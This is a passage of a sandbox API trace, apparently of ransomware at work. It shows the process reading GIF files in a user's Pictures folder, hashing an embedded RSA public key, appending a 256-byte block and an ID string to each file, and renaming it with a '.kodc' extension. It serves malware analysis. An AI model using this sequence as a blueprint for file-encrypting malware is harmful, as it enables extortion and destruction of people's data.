ftLastWriteTime.dwHighDateTime=0x1d5b98c, nFileSizeHigh=0x0, nFileSizeLow=0x8489, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hz5MGP.gif", cAlternateFileName="")) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.607] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hz5MGP.gif") returned=".gif" [0099.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hz5MGP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hz5mgp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.607] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=33929) returned 1 [0099.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.611] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8463, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.611] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.612] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.612] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x8489, lpOverlapped=0x0) returned 1 [0099.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.612] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.613] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.613] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.613] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.613] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.613] GetLastError () returned 0x0 [0099.613] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.613] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.613] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.613] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.614] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8490) returned 0x9ba6d90 [0099.614] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bc80 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bcc8 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.615] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af10 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x6868a0 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.615] GetCurrentThreadId () returned 0x42c [0099.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5858 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.616] GetCurrentThreadId () returned 0x42c [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.617] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8489, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.617] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.617] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.617] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.618] CloseHandle (hObject=0x5cc) returned 1 [0099.622] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hz5MGP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hz5mgp.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Hz5MGP.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hz5mgp.gif.kodc")) returned 1 [0099.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.622] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.624] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7d8d30, ftCreationTime.dwHighDateTime=0x1d5be35, ftLastAccessTime.dwLowDateTime=0x93c0aab0, ftLastAccessTime.dwHighDateTime=0x1d5b866, ftLastWriteTime.dwLowDateTime=0x93c0aab0, ftLastWriteTime.dwHighDateTime=0x1d5b866, nFileSizeHigh=0x0, nFileSizeLow=0x109b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJKK_.gif", cAlternateFileName="")) returned 1 [0099.624] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iJKK_.gif") returned=".gif" [0099.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iJKK_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ijkk_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.624] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=68017) returned 1 [0099.624] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.627] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1098b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.627] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.628] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.628] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x109b1, lpOverlapped=0x0) returned 1 [0099.628] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.628] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.628] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.628] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.629] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.629] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.629] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.629] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.629] GetLastError () returned 0x0 [0099.630] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.630] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.630] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.630] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.630] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x109b0) returned 0x9ba6d90 [0099.630] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bcc8 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bd10 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.631] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, 